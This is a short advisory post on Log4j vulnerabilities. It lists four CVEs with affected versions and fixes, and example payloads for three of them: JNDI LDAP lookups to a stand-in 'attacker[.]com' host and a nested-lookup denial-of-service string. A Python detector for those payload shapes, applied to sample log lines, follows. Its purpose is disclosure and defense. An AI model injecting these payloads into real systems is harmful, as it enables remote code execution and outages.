Vulnérabilités Log4j : la saga continue ...


The list of vulnerabilities discovered to date in the Log4j Java library:

  • CVE-2021-44228 (CVSS score: 10.0) - A remote code execution (RCE) vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (fixed in version 2.15.0)
    Payload: ${jndi:ldap://attacker[.]com:1389/a}
  • CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (fixed in version 2.16.0)
    Payload: ${jndi:ldap://127.0.0.1#attacker[.]com:1389/a}
  • CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service (DoS) vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (fixed in version 2.17.0)
    Payload: ${${::-${::-$${::-j}}}}
  • CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (no fix available; upgrade to version 2.17.0)
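As an added example (not part of the original post), here is a small Python detector that runs over constructed log lines and flags the three payload shapes listed above: it first collapses Log4j-style ${x:-v} and ${lower:v} lookups the way an obfuscated payload would be resolved, then looks for a jndi: URI (CVE-2021-44228), a '#' in the URI host part (the CVE-2021-45046 bypass shape) and deeply nested ${ lookups (the CVE-2021-45105 shape). The sample lines, regexes and indicator names are the author's own constructions.

```python
import re

# Constructed sample log lines (not from the original post); the lookup strings
# mirror the three payload shapes listed above, plus a ${lower:} obfuscation.
SAMPLE_LOGS = [
    'GET / "User-Agent: ${jndi:ldap://attacker[.]com:1389/a}"',
    'GET / "User-Agent: ${jndi:ldap://127.0.0.1#attacker[.]com:1389/a}"',
    'GET / "X-Api-Version: ${${::-${::-$${::-j}}}}"',
    'GET / "User-Agent: ${${lower:j}ndi:ldap://attacker[.]com:1389/a}"',
    'GET / "User-Agent: Mozilla/5.0 (X11; Linux x86_64)"',
]

DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")          # ${k:-v} -> v
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)  # ${lower:v} -> v
JNDI_URI = re.compile(r"jndi:([a-z]+)://([^/}\s]*)", re.I)         # scheme, authority

def normalize(text, max_rounds=32):
    """Collapse innermost default-value and case lookups until nothing changes."""
    for _ in range(max_rounds):
        collapsed = CASE_LOOKUP.sub(r"\1", DEFAULT_LOOKUP.sub(r"\1", text))
        if collapsed == text:
            break
        text = collapsed
    return text

def lookup_depth(text):
    """Maximum nesting depth of ${ ... } lookups in the raw (unresolved) line."""
    depth = best = i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            best = max(best, depth)
            i += 2
            continue
        if text[i] == "}" and depth:
            depth -= 1
        i += 1
    return best

def classify(line):
    """Return the set of Log4Shell-style indicators found in one log line."""
    hits = set()
    m = JNDI_URI.search(normalize(line))
    if m:
        hits.add("jndi-lookup")                # CVE-2021-44228 pattern
        if "#" in m.group(2):
            hits.add("host-fragment-bypass")   # CVE-2021-45046 pattern
    if lookup_depth(line) >= 3:
        hits.add("nested-lookup")              # CVE-2021-45105 pattern
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(sorted(classify(line)) or "clean", "|", line)
```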

Are you vulnerable?